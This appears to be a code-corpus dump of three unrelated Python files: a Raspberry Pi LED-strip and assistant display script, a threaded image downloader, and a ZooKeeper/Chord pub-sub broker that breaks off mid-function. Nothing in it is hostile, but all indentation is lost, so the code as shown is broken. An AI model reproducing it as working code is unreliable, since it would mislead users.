g = g + y[1]
b = b + y[2]
w = w + y[3]
if wifiled.is_on:
ison = True
brightnes = brightnes + wifiled.brightness
i = i + 1
r = round(r/i)
g = round(g/i)
b = round(b/i)
w = round(w/i)
brightnes = round(brightnes/i)
else:
wifiled = listwifi[name]
wifiled.refreshState()
y = wifiled.getRgbw()
r = y[0]
g = y[1]
b = y[2]
w = y[3]
ison = wifiled.is_on
brightnes = wifiled.brightness
brightnessim = Image.open('~/google-assistant/src/images/led_strip/brightness.jpg')
brightnessim = brightnessim.resize((17,17))
brightnessim = ImageOps.invert(brightnessim)
image.paste(brightnessim, (28,12))
draw.text(((127 - (len(name) * 6)) / 2,0), name, font=font, fill=225)
if ison:
if selection[1] == 0:
if selection[0]:
draw.rectangle((0, 15, (len(str('on')) * 6) + 2, 25), outline=255, fill=255)
draw.text((2,15), 'on', font=font, fill=0)
else:
draw.rectangle((0, 15, (len(str('on')) * 6) + 2, 25), outline=255, fill=0)
draw.text((2,15), 'on', font=font, fill=225)
else:
draw.text((2,15), 'on', font=font, fill=225)
else:
if selection[1] == 0:
if selection[0]:
draw.rectangle((0, 15, (len(str('off')) * 6) + 2, 25), outline=255, fill=255)
draw.text((2,15), 'off', font=font, fill=0)
else:
draw.rectangle((0, 15, (len(str('off')) * 6) + 2, 25), outline=255, fill=0)
draw.text((2,15), 'off', font=font, fill=225)
else:
draw.text((2,15), 'off', font=font, fill=225)
if selection[1] == 1:
if selection[0]:
draw.rectangle((44, 15, (len(str(brightnes)) * 6) + 46, 25), outline=255, fill=255)
draw.text((46,15), str(brightnes), font=font, fill=0)
else:
draw.rectangle((44, 15, (len(str(brightnes)) * 6) + 46, 25), outline=255, fill=0)
draw.text((46,15), str(brightnes), font=font, fill=225)
else:
draw.text((46,15), str(brightnes), font=font, fill=225)
if selection[1] == 2:
draw.rectangle((74, 15, 88, 25), outline=255, fill=0)
draw.line((76,17,86,17), fill=255)
draw.line((76,19,86,19), fill=255)
draw.line((76,21,86,21), fill=255)
draw.line((76,23,86,23), fill=255)
if selection[1] == 3:
draw.rectangle((108, 15, (len(str('+')) * 6) + 110, 25), outline=255, fill=0)
draw.text((110,15), '+', font=font, fill=225)
xcenter = (127 - (len(colorlist[selectlist]) * 6)) / 2
if selection[1] == 5:
draw.rectangle((0, 29, 127, 48), outline=255, fill=0)
if selection[0]:
draw.rectangle((xcenter - 4, 31, (len(colorlist[selectlist]) * 6) + xcenter + 3, 46), outline=255, fill=0)
i = selectlist - 1
while i > -1:
xcenter = xcenter - (12 + (len(colorlist[i]) * 6))
i = i - 1
draw.text((xcenter,33), " ".join(colorlist), font=font, fill=225)
if selection[1] == 6:
if selection[0]:
draw.rectangle((8, 53, (len(str(r)) * 6) + 11, 63), outline=255, fill=255)
draw.text((10,53), str(r), font=font, fill=0)
else:
draw.rectangle((8, 53, (len(str(r)) * 6) + 11, 63), outline=255, fill=0)
draw.text((10,53), str(r), font=font, fill=225)
draw.text((0,53), 'R', font=font, fill=225)
else:
draw.text((0,53), 'R:', font=font, fill=225)
draw.text((10,53), str(r), font=font, fill=225)
if selection[1] == 7:
if selection[0]:
draw.rectangle((40, 53, (len(str(g)) * 6) + 43, 63), outline=255, fill=255)
draw.text((42,53), str(g), font=font, fill=0)
else:
draw.rectangle((40, 53, (len(str(g)) * 6) + 43, 63), outline=255, fill=0)
draw.text((42,53), str(g), font=font, fill=225)
draw.text((32,53), 'G', font=font, fill=225)
else:
draw.text((32,53), 'G:', font=font, fill=225)
draw.text((42,53), str(g), font=font, fill=225)
if selection[1] == 8:
if selection[0]:
draw.rectangle((72, 53, (len(str(b)) * 6) + 75, 63), outline=255, fill=255)
draw.text((74,53), str(b), font=font, fill=0)
else:
draw.rectangle((72, 53, (len(str(b)) * 6) + 75, 63), outline=255, fill=0)
draw.text((74,53), str(b), font=font, fill=225)
draw.text((64,53), 'B', font=font, fill=225)
else:
draw.text((64,53), 'B:', font=font, fill=225)
draw.text((74,53), str(b), font=font, fill=225)
if selection[1] == 9:
if selection[0]:
draw.rectangle((104, 53, (len(str(w)) * 6) + 107, 63), outline=255, fill=255)
draw.text((106,53), str(w), font=font, fill=0)
else:
draw.rectangle((104, 53, (len(str(w)) * 6) + 107, 63), outline=255, fill=0)
draw.text((106,53), str(w), font=font, fill=225)
draw.text((96,53), 'W', font=font, fill=225)
else:
draw.text((96,53), 'W:', font=font, fill=225)
draw.text((106,53), str(w), font=font, fill=225)
disp.image(image)
Myassistant.refrech_error()
buton = 20000
while buton > 0 and not self.al:
self.veil = 0
if not len(self.buton) == 0:
if self.buton[0] == 0 :
del self.buton[0]
cont = False
buton = 0
elif self.buton[0] == 1 :
del self.buton[0]
if selection[1] == 2:
ledsearchaff = [['All','All']]
for sdna in name_wifi_led:
ledsearchaff.append([str(sdna),str(sdna)])
name = Myassistant.select_list(self,ledsearchaff,'select led strip')
if name == None:
name = 'All'
elif selection[1] == 3:
ffgddsj = Myassistant.select_list(self,[['Colors','color'],['Preset pattern','pattern'],['Exit','exit']],'choice')
if ffgddsj == 'pattern':
fgcolorpatname = ['seven color cross fade','red gradual change','green gradual change','blue gradual change','yellow gradual change','cyan gradual change','purple gradual change','white gradual change','red green cross fade','red blue cross fade','green blue cross fade','seven color strobe flash','red strobe flash','green strobe flash','blue strobe flash','yellow strobe flash','cyan strobe flash','purple strobe flash','white strobe flash','seven color jumping']
fgcolorpat = ['setPresetPattern(0x25,100)','setPresetPattern(0x26,100)','setPresetPattern(0x27,100)','setPresetPattern(0x28,100)','setPresetPattern(0x29,100)','setPresetPattern(0x2a,100)','setPresetPattern(0x2b,100)','setPresetPattern(0x2c,100)','setPresetPattern(0x2d,100)','setPresetPattern(0x2e,100)','setPresetPattern(0x2f,100)','setPresetPattern(0x30,100)','setPresetPattern(0x31,100)','setPresetPattern(0x32,100)','setPresetPattern(0x33,100)','setPresetPattern(0x34,100)','setPresetPattern(0x35,100)','setPresetPattern(0x36,100)','setPresetPattern(0x37,100)','setPresetPattern(0x38,100)']
collen = 0
mixcolornamepat = []
while collen < len(fgcolorpatname):
mixcolornamepat.append([str(fgcolorpatname[collen]),str(fgcolorpat[collen])])
collen = collen + 1
presety = Myassistant.select_list(self,mixcolornamepat,'preset pattern')
if not presety == None:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
eval('wifiled.' + str(presety))
else:
eval('wifiled.' + str(presety))
speed = Myassistant.select_cursor(self,100,0,5,100,"",'speed')
presety = str(presety).replace(',100)',','+str(speed)+')')
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
eval('wifiled.' + str(presety))
else:
eval('wifiled.' + str(presety))
response = str(presety)
elif ffgddsj == 'color':
jgiush = []
responscoled = flux_led.utils.get_color_names_list()
for tey in responscoled:
jgiush.append([tey,tey])
fdlghfdh = Myassistant.select_search_list(self,jgiush)
if not fdlghfdh == None:
resultintero = flux_led.utils.color_object_to_tuple(fdlghfdh)
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
if wifiled.brightness+10 > 255 :
wifiled.setRgb(resultintero[0],resultintero[1],resultintero[2])
else:
wifiled.setRgb(resultintero[0],resultintero[1],resultintero[2])
else:
if brightnes+10 > 255:
wifiled.setRgb(resultintero[0],resultintero[1],resultintero[2])
else:
wifiled.setRgb(resultintero[0],resultintero[1],resultintero[2])
response = None
elif selection[1] == 5:
if not selection[0]:
selection[0] = not selection[0]
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
else:
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
ifwantreload = 0
response = str(coloraction[selectlist])
else:
selection[0] = not selection[0]
ifwantreload = 0
else:
selection[0] = not selection[0]
elif self.buton[0] == 2 :
del self.buton[0]
if selection[0]:
if selection[1] == 0:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
if ison:
wifiled.turnOff()
response = 'turnOff()'
else:
wifiled.turnOn()
response = 'turnOn()'
else:
if ison:
wifiled.turnOff()
response = 'turnOff()'
else:
wifiled.turnOn()
response = 'turnOn()'
elif selection[1] == 1:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if wifiled.brightness+10 > 255 :
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3],brightness=255)
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3],brightness=wifiled.brightness+10)
else:
if brightnes+10 > 255:
wifiled.setRgbw(r=r,g=g,b=b,w=w,brightness=255)
else:
wifiled.setRgbw(r=r,g=g,b=b,w=w,brightness=brightnes+10)
response = None
elif selection[1] == 6:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[0]+10 > 255 :
wifiled.setRgbw(r=255,g=y[1],b=y[2],w=y[3])
else:
wifiled.setRgbw(r=y[0]+10,g=y[1],b=y[2],w=y[3])
else:
if r+10 > 255:
wifiled.setRgbw(r=255,g=g,b=b,w=w)
else:
wifiled.setRgbw(r=r+10,g=g,b=b,w=w)
response = None
elif selection[1] == 7:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[1]+10 > 255 :
wifiled.setRgbw(r=y[0],g=255,b=y[2],w=y[3])
else:
wifiled.setRgbw(r=y[0],g=y[1]+10,b=y[2],w=y[3])
else:
if g+10 > 255:
wifiled.setRgbw(r=r,g=255,b=b,w=w)
else:
wifiled.setRgbw(r=r,g=g+10,b=b,w=w)
response = None
elif selection[1] == 8:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[2]+10 > 255 :
wifiled.setRgbw(r=y[0],g=y[1],b=255,w=y[3])
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2]+10,w=y[3])
else:
if g+10 > 255:
wifiled.setRgbw(r=r,g=g,b=255,w=w)
else:
wifiled.setRgbw(r=r,g=g,b=b+10,w=w)
response = None
elif selection[1] == 9:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[3]+10 > 255 :
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=255)
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3]+10)
else:
if w+10 > 255:
wifiled.setRgbw(r=r,g=g,b=b,w=255)
else:
wifiled.setRgbw(r=r,g=g,b=b,w=w+10)
response = None
elif selection[1] == 5:
if not selectlist + 1 > len(colorlist)-1:
selectlist = selectlist + 1
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
else:
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
ifwantreload = 0
response = str(coloraction[selectlist])
else:
if not selection[1] + 1 > 9:
selection[1] = selection[1] + 1
if selection[1] == 4:
selection[1] = 5
else:
selection[1] = 0
elif self.buton[0] == 3 :
del self.buton[0]
if selection[0]:
if selection[1] == 0:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
if ison:
wifiled.turnOff()
response = 'turnOff()'
else:
wifiled.turnOn()
response = 'turnOn()'
else:
if ison:
wifiled.turnOff()
response = 'turnOff()'
else:
wifiled.turnOn()
response = 'turnOn()'
elif selection[1] == 1:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if wifiled.brightness-10 < 0 :
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3],brightness=0)
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3],brightness=wifiled.brightness-10)
else:
if brightnes-10 < 0:
wifiled.setRgbw(r=r,g=g,b=b,w=w,brightness=0)
else:
wifiled.setRgbw(r=r,g=g,b=b,w=w,brightness=brightnes-10)
response = None
elif selection[1] == 6:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[0]-10 < 0 :
wifiled.setRgbw(r=0,g=y[1],b=y[2],w=y[3])
else:
wifiled.setRgbw(r=y[0]-10,g=y[1],b=y[2],w=y[3])
else:
if r-10 < 0:
wifiled.setRgbw(r=0,g=g,b=b,w=w)
else:
wifiled.setRgbw(r=r-10,g=g,b=b,w=w)
response = None
elif selection[1] == 7:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[1]-10 < 0 :
wifiled.setRgbw(r=y[0],g=0,b=y[2],w=y[3])
else:
wifiled.setRgbw(r=y[0],g=y[1]-10,b=y[2],w=y[3])
else:
if g-10 < 0:
wifiled.setRgbw(r=r,g=0,b=b,w=w)
else:
wifiled.setRgbw(r=r,g=g-10,b=b,w=w)
response = None
elif selection[1] == 8:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[2]-10 < 0 :
wifiled.setRgbw(r=y[0],g=y[1],b=0,w=y[3])
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2]-10,w=y[3])
else:
if b-10 < 0:
wifiled.setRgbw(r=r,g=g,b=0,w=w)
else:
wifiled.setRgbw(r=r,g=g,b=b-10,w=w)
response = None
elif selection[1] == 9:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[3]-10 < 0 :
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=0)
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3]-10)
else:
if w-10 < 0:
wifiled.setRgbw(r=r,g=g,b=b,w=0)
else:
wifiled.setRgbw(r=r,g=g,b=b,w=w-10)
response = None
elif selection[1] == 5:
if not selectlist - 1 < 0:
selectlist = selectlist - 1
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
else:
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
ifwantreload = 0
response = str(coloraction[selectlist])
else:
if not selection[1] - 1 < 0:
selection[1] = selection[1] - 1
if selection[1] == 4:
selection[1] = 3
else:
selection[1] = 9
ifwantreload = 0
if not len(self.buton) == 0:
buton = 5
else:
buton = 0
self.veil = 0
buton = buton - 1
resoul = ['','']
if name == 'All':
resoul[0] = []
for adress in ip_wifi_led:
resoul[0].append(adress)
else:
resoul[0] = ip_wifi_led[name_wifi_led.index(name)]
if not response == None:
resoul[1] = str(response)
else:
if name == 'All':
r = 0
g = 0
b = 0
w = 0
i = 0
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
r = r + y[0]
g = g + y[1]
b = b + y[2]
w = w + y[3]
i = i + 1
r = round(r/i)
g = round(g/i)
b = round(b/i)
w = round(w/i)
else:
wifiled = listwifi[name]
y = wifiled.getRgbw()
r = y[0]
g = y[1]
b = y[2]
w = y[3]
if w == 0:
resoul[1] = 'setRgb(r='+str(r)+',g='+str(g)+',b='+str(b)+')'
else:
resoul[1] = 'setRgbw(r='+str(r)+',g='+str(g)+',b='+str(b)+',w='+str(w)+')'
i = len(save_list_color) - 1
while i > -1:
wifiled = led.WifiLedBulb(ip_wifi_led[i])
if save_list_color[i][4]:
wifiled.turnOn()
wifiled.setRgbw(r=save_list_color[i][0],g=save_list_color[i][1],b=save_list_color[i][2],w=save_list_color[i][3])
else:
wifiled.turnOff()
i = i - 1
return resoul
except BrokenPipeError:
self.veil = 0
print('Failed : "led strip"')
resoul = ['','']
resoul[0] = []
for adress in ip_wifi_led:
resoul[0].append(adress)
resoul[1] = 'turnOn()'
return resoul
def set_word_aff(self, i):
lines = str(i).split(" ")
conta = True
i = 0
h = []
while conta:
char = ''
charlen = 0
conti = True
while conti:
if char == '':
char = char + lines[i]
else:
char = char + ' ' + lines[i]
charlen = charlen + len(lines[i])
i = i + 1
if not len(lines)-1 < i:
if charlen + 1 + len(lines[i]) > 19:
conti = False
else:
conti = False
h.append(char)
if len(lines)-1 < i:
conta = False
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
if len(h) == 1:
draw.text(((128 - (len(h[0]) * 6)) / 2,26),h[0], font=font, fill=225)
else:
jjg = (64 - (len(h) * 12)) / len(h)
for uut in h:
draw.text((((128 - (len(uut) * 6)) / 2,jjg)),uut, font=font, fill=225)
jjg = jjg + 12
disp.image(image)
Myassistant.refrech_error()
self.veil = settings.get("Time stand by")*2+1
if __name__ == '__main__':
try:
Myassistant().main()
except:
errort = traceback.format_exc().split('\n')
error = errort[len(errort)-4].replace(' ','') + ': '
error = 'File ' + error.split('/')[len(error.split('/'))-1].replace('"','')
error = error + errort[len(errort)-2]
if 'KeyboardInterrupt' in error:
exit(0)
else:
print(error)
filerror = open('~/google-assistant/src/ga_error','a')
filerror.write(time.strftime("%d-%m-%Y %H:%M:%S ")+str(error)+'\n')
filerror.close()
if settings.get("Sense hat"):
Myassistant.logo_high()
Myassistant.logo_low()
if settings.get("Lcd screen"):
lines = str(error).split(" ")
conta = True
i = 0
h = []
while conta:
char = ''
charlen = 0
conti = True
while conti:
if char == '':
char = char + lines[i]
else:
char = char + ' ' + lines[i]
charlen = charlen + len(lines[i])
i = i + 1
if not len(lines)-1 < i:
if charlen + 1 + len(lines[i]) > 19:
conti = False
else:
conti = False
h.append(char)
if len(lines)-1 < i:
conta = False
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
if len(h) == 1:
draw.text(((128 - (len(h) * 6)) / 2,26),h[0], font=font, fill=225)
else:
jjg = (64 - (len(h) * 12)) / len(h)
for uut in h:
draw.text((((128 - (len(uut) * 6)) / 2,jjg)),uut, font=font, fill=225)
jjg = jjg + 12
disp.clear()
Myassistant.refrech_error()
disp.image(image)
Myassistant.refrech_error()
i = 1000
while i > 0:
if GPIO.input(bsquare) == 0 or GPIO.input(bround) == 0 or GPIO.input(brigt) == 0 or GPIO.input(bleft) == 0:
i = 0
time.sleep(0.1)
i = i - 1
disp.clear()
Myassistant.refrech_error()
if i == -1:
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
draw.text((0,0), 'stop Google Assistant', font=font, fill=255)
draw.text((30,15), 'restart Google A', font=font, fill=255)
draw.text((55,30), 'shutdown RPI', font=font, fill=255)
draw.text((85,45), 'nothing', font=font, fill=255)
draw.line((5,15,5,63), fill=255)
draw.line((45,30,45,63), fill=255)
draw.line((80,45,80,63), fill=255)
draw.line((120,60,120,63), fill=255)
disp.image(image)
Myassistant.refrech_error()
i = 1000
while i > 0:
if GPIO.input(bleft) == 0:
i = -4
disp.clear()
Myassistant.refrech_error()
os.system("sudo systemctl stop google-assistant-ok-google.service")
elif GPIO.input(brigt) == 0:
i = -4
disp.clear()
Myassistant.refrech_error()
os.system("sudo systemctl restart google-assistant-ok-google.service")
elif GPIO.input(bround) == 0:
i = -4
disp.clear()
Myassistant.refrech_error()
os.system("sudo halt")
elif GPIO.input(bsquare) == 0:
i = -4
time.sleep(0.1)
i = i - 1
if not i == -5:
disp.clear()
Myassistant.refrech_error()
os.system("sudo systemctl stop google-assistant-ok-google.service")
else:
disp.clear()
Myassistant.refrech_error()
os.system("sudo systemctl stop google-assistant-ok-google.service")
|
file_download.py
|
# -*- coding: utf-8 -*-
import os
from contextlib import closing
import threading
import requests
import time
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'
}
#输出文件夹
out_dir = './output'
#线程数
thread_num = 20
#http请求超时设置
timeout = 5
if not os.path.exists(out_dir):
os.mkdir(out_dir)
def download(img_url, img_name):
if os.path.isfile(os.path.join(out_dir, img_name)):
return
with closing(requests.get(img_url, stream=True, headers=headers, timeout=timeout)) as r:
rc = r.status_code
if 299 < rc or rc < 200:
print 'returnCode%s\t%s' % (rc, img_url)
return
content_length = int(r.headers.get('content-length', '0'))
if content_length == 0:
print 'size0\t%s' % img_url
return
try:
with open(os.path.join(out_dir, img_name), 'wb') as f:
for data in r.iter_content(1024):
f.write(data)
except:
print 'savefail\t%s' % img_url
def get_imgurl_generate():
with open('./final.scp', 'r') as f:
index = 0
for line in f:
index += 1
if index % 500 == 0:
print 'execute %s line at %s' % (index, time.time())
if not line:
print ur'line %s is empty "\t"' % index
continue
line = line.strip()
try:
imgs = line.split('\t')
if len(imgs) != 2:
print ur'line %s splite error' % index
continue
if not imgs[0] or not imgs[1]:
print ur'line %s img is empty' % index
continue
yield imgs
except:
print ur'line %s can not split by "\t"' % index
lock = threading.Lock()
def loop(imgs):
print 'thread %s is running...' % threading.current_thread().name
while True:
try:
with lock:
img_url, img_name = next(imgs)
except StopIteration:
break
try:
download(img_url, img_name)
except:
print 'exceptfail\t%s' % img_url
print 'thread %s is end...' % threading.current_thread().name
img_gen = get_imgurl_generate()
for i in range(0, thread_num):
t = threading.Thread(target=loop, name='LoopThread %s' % i, args=(img_gen,))
t.start()
|
pubsubBroker.py
|
import threading, queue
import sys, os, time
import logging
from requests import get
from xmlrpc.server import SimpleXMLRPCServer
from xmlrpc.server import SimpleXMLRPCRequestHandler
from socketserver import ThreadingMixIn
from kazoo.client import KazooClient
from kazoo.client import KazooState
from kazoo.exceptions import KazooException, OperationTimeoutError
from kazoo.protocol.paths import join
from chord_node import *
from topic import Topic, consuming_enqueue
from event import *
from zk_helpers import *
from pubsubClient import buildBrokerClient
BROKER_REG_PATH = "/brokerRegistry"
logging.basicConfig(level=logging.WARNING)
class RequestHandler(SimpleXMLRPCRequestHandler):
rpc_paths = ('/RPC2',)
class threadedXMLRPCServer(ThreadingMixIn, SimpleXMLRPCServer):
pass
class PubSubBroker:
def __init__(self, my_address, zk_hosts):
self.my_znode = ""
self.my_address = my_address
self.zk_hosts = zk_hosts
self.zk_client = KazooClient(hosts=makeHostsString(zk_hosts))
self.zk_client.add_listener(self.state_change_handler)
self.brokers = [] # array of ChordNodes representing the ChordRing
# Let Broker Control Functionality by responding to events
self.event_queue = queue.Queue()
self.operational = False # RPC method should/not accept requests
self.curr_view = 0 # view number
# Topic Responsibilities
self.primary_segment = (-1,-1)
self.replica_segment = (-1,-1)
self.temp_block_segment = (-1, -1) # chord segment that this Broker should service (View Change)
# Topic data structures
self.creation_lock = threading.Lock() # lock for when Broker needs to create a topic
self.topics = {} # dictionary - (topic: str) => Class Topic
self.pending_buffers = {} # dictionary - (topic: str) => Class Topic
# RPC Methods ==========================
def enqueue(self, topic: str, message: str):
if not self.operational:
print("Not Operational")
return False
topic_hash = chord_hash(topic)
my_job = in_segment_range(topic_hash, self.primary_segment[0], self.primary_segment[1])
blocked = in_segment_range(topic_hash, self.temp_block_segment[0], self.temp_block_segment[1])
if not my_job or blocked:
print("Not My Job ({}) or Blocked ({})".format(not my_job, blocked))
return False
# protect against contention when creating topics
if not self.topics.get(topic, None):
self.creation_lock.acquire()
if not self.topics.get(topic, None):
self.topics[topic] = Topic(topic)
self.creation_lock.release()
# atomically assigns an index to the message
message_index = self.topics[topic].publish(message)
# who are my successors
repl1, repl1_index = find_chord_successor(self.my_address, self.brokers)
repl2, repl2_index = find_chord_successor(repl1.key, self.brokers, repl1_index)
succ_one_exception = False
succ_two_exception = False
try:
if repl1.key != self.my_address:
r1Client = buildBrokerClient(repl1.key)
success_one = r1Client.broker.enqueue_replica(topic, message, message_index - 1)
except Exception as e:
succ_one_exception = True
try:
if repl2.key != self.my_address:
r2Client = buildBrokerClient(repl2.key)
success_two = r2Client.broker.enqueue_replica(topic, message, message_index - 1)
except Exception as e:
succ_two_exception = True
if succ_one_exception and succ_two_exception:
print("A PubSub Assumption Was Violated: Terminating this Broker")
exit(1)
return True
def enqueue_replica(self, topic: str, message: str, index: int):
if not self.operational:
return False
# protect against contention when creating topics
if not self.topics.get(topic, None):
self.creation_lock.acquire()
if not self.topics.get(topic, None):
self.topics[topic] = Topic(topic)
self.creation_lock.release()
broker = find_chord_successor(topic, self.brokers)
broker_rpc_client = buildBrokerClient(broker[0].key)
# attempts to move the commit point as aggressiively as possible
consuming_enqueue(self.topics[topic], broker_rpc_client, message, index)
return True
def last_index(self, topic: str):
if not self.operational:
return -1
if not self.topics.get(topic, None):
return 0
return self.topics[topic].next_index()
def consume(self, topic: str, index: int):
if not self.operational or not self.topics.get(topic, None):
return []
return self.topics[topic].consume(index)
def get_queue(self, topic):
return self.topics[topic].messages
def get_topics(self):
return list(self.topics.keys())
def request_view_change(self, start: int, end: int):
"""This broker is being requested by another broker to perform a view change.
Other Broker (new primary) wants to take responsibility for the segment of
the chord ring [start, end].
This broker needs to lock all of the topic channels it has between start and end,
and cease taking user requests for these topics and provide the new broker with the
index of the queue that it can begin pushing messages to.
"""
logging.warning("Broker {} is blocking requests for [{},{}]".format(
self.my_address, str(start), str(end)))
# 1) Change Temp Blocked Segment Range
self.temp_block_segment = (start, end)
# 2) Fill in Topic Vector Map with Next Available Index
topic_vector = {} # Example: {"sport": 13, "politics": 98} # (topic_name, index)
for name, topic in self.topics.items():
# only add topic queues from this segment
if in_segment_range(chord_hash(name), start, end):
topic_vector[name] = topic.next_index()
return self.curr_view, topic_vector
def consume_bulk_data(self, start, end):
"""This func is called via RPC by another broker. Usually called when
a broker needs to get "up to speed" with some new topics it is
responsible for.
Returns all topic data that fall in the range of start, end
"""
# the data we want to return
data = {}
# find which belong to you
for name, topic in self.topics.items():
t_hash = chord_hash(name)
# if the hash is in your primary range
if in_segment_range(t_hash, start, end):
# add the topic data to the data to be returned
data[name] = topic.consume(0)
return data
# Control Methods ========================
def serve(self):
# start process of joining the system
self.event_queue.put(ControlEvent(EventType.RESTART_BROKER))
while True: # infinite Broker serving loop
# Wait for an event off the communication channel
# and respond to it
event = self.event_queue.get() # blocking call
if event.name == EventType.PAUSE_OPER:
self.operational = False
elif event.name == EventType.RESUME_OPER:
# Don't quite know what will need to be done in this situation
# 1) Get an updated chord ring because no guarantees that it
# is still the same since we were last connected.
# 2) This may also imply some catch up on data!
# 2) Make RPC server operational
pass
elif event.name == EventType.RESTART_BROKER:
# retry Making connection with ZooKeeper and joining the cluster
self.restart_broker()
elif event.name == EventType.RING_UPDATE:
# Take care of new updated chord ring
ring = event.data[CHORD_RING]
self.manage_ring_update(ring)
# reset watch on Broker Registry in ZooKeeper
self.zk_client.get_children(BROKER_REG_PATH, watch=self.registry_callback)
elif event.name == EventType.UPDATE_TOPICS:
segment = event.data[SEGMENT] # segment of chord ring in question
pred, _ = find_chord_predecessor(self.my_address, self.brokers)
self.perform_replica_sync(segment, pred)
elif event.name == EventType.VIEW_CHANGE:
segment = event.data[SEGMENT] # segment of chord ring in question
succ,_ = find_chord_successor(self.my_address, self.brokers)
self.perform_view_change_sync(segment, succ)
else:
logging.warning("Unknown Event detected: {}".format(event.name))
def restart_broker(self):
connected = False
while not connected:
try:
# start the client
self.zk_client.start()
connected = True
except Exception as e:
logging.warning("Join Cluster error: {}".format(e))
try:
# build chord ring for the first time
self.zk_client.ensure_path(BROKER_REG_PATH)
broker_addrs = self.zk_client.get_children(BROKER_REG_PATH)
self.brokers = create_chord_ring(broker_addrs)
except Exception as e:
logging.warning("Join Cluster error: {}".format(e))
self.event_queue.put(ControlEvent(EventType.RESTART_BROKER))
return
# TODO Request a View Change from the previous Primary
# 1) determine topic range this broker will inhabit
start, end = find_prime_chord_segment(self.my_address, self.brokers)
# 2) determine who the previous primary is
curr_primary, _ = find_chord_successor(self.my_address, self.brokers)
# 3) request view change for that keyspace
if curr_primary != None:
# set up RPC-client
broker_rpc = buildBrokerClient(curr_primary.key)
prev_view, topic_vector = broker_rpc.broker.request_view_change(start, end)
# do something with the Topic Vector
self.prepare_as_primary(topic_vector)
else:
prev_view = 0
self.curr_view = prev_view
logging.warning("Broker {} is starting view {}. Responsible for [{},{}]".format(
self.my_address, str(prev_view + 1), str(start), str(end)))
# 4) Jump into the mix by registering in ZooKeeper
self.join_cluster()
def join_cluster(self):
try:
# enable RPC requests to come through
self.operational = True
# create a watch and a new node for this broker
self.zk_client.ensure_path(BROKER_REG_PATH)
self.zk_client.get_children(BROKER_REG_PATH, watch=self.registry_callback)
my_path = BROKER_REG_PATH + "/{}".format(self.my_address)
self.my_znode = self.zk_client.create(my_path, value="true".encode("utf-8"), ephemeral=True)
except Exception as e:
logging.warning("Join Cluster error: {}".format(e))
self.operational = False
time.sleep(1)
self.event_queue.put(ControlEvent(EventType.RESTART_BROKER))
def manage_ring_update(self, updated_ring):
# Print to logs
self.curr_view += 1
formatted = ["{}".format(str(node)) for node in updated_ring]
logging.warning("Broker view {} -- Watch: {}".format(
str(self.curr_view),", ".join(formatted)))
# Detect if this broker should respond to changes in its Primary segment
# np_start => new primary start cp_start => current primary start
np_start, np_end = find_prime_chord_segment(self.my_address, updated_ring)
print(np_start, " -- ", np_end)
(cp_start, cp_end) = self.primary_segment
curr_range = segment_range(cp_start, cp_end)
new_range = segment_range(np_start, np_end)
if new_range > curr_range: # gained responsibility
if (cp_start == -1): delta_end = np_end
elif (cp_start == 0): delta_end = MAX_HASH - 1
else: delta_end = cp_start - 1
view_change = ControlEvent(EventType.VIEW_CHANGE, {SEGMENT: (np_start, delta_end)})
self.event_queue.put(view_change)
else:
self.temp_block_segment = (-1, -1)
# No need to do anything if range is smaller or the same
# Detect if this Broker should respond to changes in its Replica Segment
nr_start, nr_end = find_repl_chord_segment(self.my_address, updated_ring)
logging.warning("Repl Chord Ring segment[{}, {}]".format(
